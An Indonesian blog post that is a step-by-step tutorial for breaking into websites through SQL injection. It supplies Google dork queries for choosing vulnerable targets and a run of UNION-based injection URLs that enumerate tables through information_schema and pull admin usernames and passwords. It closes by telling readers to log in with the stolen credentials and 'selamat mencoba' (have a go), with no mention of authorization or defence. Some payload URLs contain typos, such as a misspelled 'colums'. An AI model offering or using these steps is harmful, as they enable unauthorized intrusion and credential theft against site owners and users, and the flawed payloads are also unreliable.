Beranda  ›  OOT

Cara Hack Website dengan SQL Injection 2024

Ditulis Jumat, 29 Maret 2024
Cara Hack Website dengan SQL Injection
Cara Hack Website dengan SQL Injection - SQL Injection adalah salah satu aplikasi yang bisa digunakan untuk membobol atau hack sebuah website.

Proses hack website menggunakan SQL Injection akan sukses jika Anda berhasil memasukkan beberapa SLQ statement ke dalam query.

Karena dalam proses hack yang dilakukan, Anda akan memanipulasi atau mengotak ati data input ke dalam SQL tersebut.

Sebenarnya ada banyak cara atau metode yang bisa digunakan untuk hack website, namun kami mennggunakan SQL karena pengoperasiannya lebih mudah dibandingkan yang lain.


Pembahasan Cara Hack Website dengan SQL Injection

Lalu bagaimana cara hack pada website yang menggunakan SQL Injection tersebut? Untuk caranya terbilang mudah dan bisa Anda lakukan sendiri.

Tetapi Anda harus ketahui juga, ada kemungkinan terburuk yang akan terjadi pada sistem yang Anda gunakan jika menggunakan SQL.

Namun kemungkinan terburuk atau resiko tersebut dapat diminimalisir jika proses hack dilakukan dengan hati-hati dan membekali perangkat dengan sistem keamanan yang tinggi.


Daripada penasaran, yuk langsung saja simak ulasan berikut ini tentang cara hack website dengan SQL Injection.


Cara Hack Website dengan SQL Injection

Cara Hack Website dengan SQL Injection Terbaru

Cara Hack Website dengan SQL Injection
Cara Hack Website dengan SQL Injection Terbaru
Ada beberapa langkah yang harus dilakukan jika ingin hack website menggunakan SQL Injection.

Untuk lebih jelasnya, berikut ini cara hack website dengan SQL Injection:
  • Untuk langkah pertama, silahkan pilih target hack yang ingin di hack, seperti daftar di bawah ini:
    • inurl:iniziativa.php?in=
    • inurl:curriculum.php?id=
    • inurl:labels.php?id=
    • inurl:story.php?id=
    • inurl:look.php?ID=
    • inurl:newsone.php?id=
    • inurl:aboutbook.php?id=inurl:material.php?id=
    • inurl:opinions.php?id=
    • inurl:announce.php?id=
  • Sebagai contoh, Anda bisa memilih target hack seperti di bawah ini:
https://www.target.com/berita.php?id=100
  • Untuk melihat apakah ada pesan error, silahkan tambahkan karakter pada akhir URL atau bisa juga menambahkan tanda "-"
Contoh:
https://www.target.com/berita.php?id=100'

Menjadi:
https://www.target.com/berita.php?id=-100
  • Secara otomatis, pesan error akan muncul seperti di bawah ini:
"You have an error in your SQL syntax. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near"at line 1".
  • Selanjutnya cari dan hitunglah jumlah table yang ada dalam databasenya dan disini kita akan menggunakan perintah order by.
Contoh:
https://www.target.com/berita.php?id=100+order+by+1/*
  • Tanda (*) adalah karakter penutup perintah SQL atau Anda juga bisa menggunkanan tanda (-) guys, tinggal pilih salah satu. Sedangkan tanda (+) adalah tanda penghubung perintah.
  • Kemudian Anda bisa mencobanya satu persatu seperti di bawah ini:
    • https://www.target.com/berita.php?id=100+order+by+1/* (tidak ada error)
    • https://www.target.com/berita.php?id=100+order+by+2/* (tidak ada error)
    • https://www.target.com/berita.php?id=100+order+by+3/* (lelah)
    • https://www.target.com?berita.php?id=100+order+by+4/* (jangan menyerah)
  • Jika ada error yang muncul dan errornya ada seperti keterangan di bawah ini:
https://www.target.com/berita.php?id=100+order+by+10/*
  • Berarti Anda harus mengambil yang sembilan guys, seperti di bawah ini:
https://www.target.com/berita.php?id=100+order+by+9/*
  • Lalu untuk mengetahui berapa angka yang show sekarang yang Anda gunakan UNION, contohnya seperti di bawah ini:
https://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9?*
  • Silahkan perhatikan angka berapa saja yang keluar, jika yang keluar angka 3, maka Anda harus mengecek versi berapa MySQL yang digunakan dengan perintah "version()" atau "@@version" yaitu:
https://www.target.com/news.php?id=union+select+1,2, version(),4,5,6,7,8,9/* atau https://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
  • Sedangkan jika versinya 5, Anda bisa langsung menggunakan perintah "information_schema" untuk melihat tabel serta kolom yang ada di database, contohnya:
https://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.table
  • Bila Anda ingin melihat tabel-tabel yang lain, silahkan tambahkan limit URL, tetapi terkadang tabelnya tidak akan terlihat dengan cara tersebut. Oleh karena itu, Anda bisa menggunakan cara berikut yaitu dengan cara mengganti kata 'table" nya saja.
https://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums?*
  • Jika kolom yang keluar adalah password dan username dari website, maka Anda bisa langsung melihat isinya, contoh:
https://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/* dan https://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*


Sekarang Anda bisa melihat username serta passwordnya dan bisa langsung digunakan untuk login ke websitenya guys.



Akhir Kata

Demikian cara hack website menggunakan SQL Injection yang bisa dipelajari dan diterapkan.

Jika melihat dan membaca langkah hack yang sudah kami uraikan di atas memang terlihat rumit, namun jika dipraktikkan akan jauh lebih mudah.

Agar proses hack website dengan SQL Injection berjalan lancar, silahkan pelajari dan lakukan setiap langkah dengan baik dan benar.

Itulah seluruh isi artikel kami kali ini mengenai cara hack website dengan SQL Injection 2024. Semoga bermanfaat dan selamat mencoba.

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel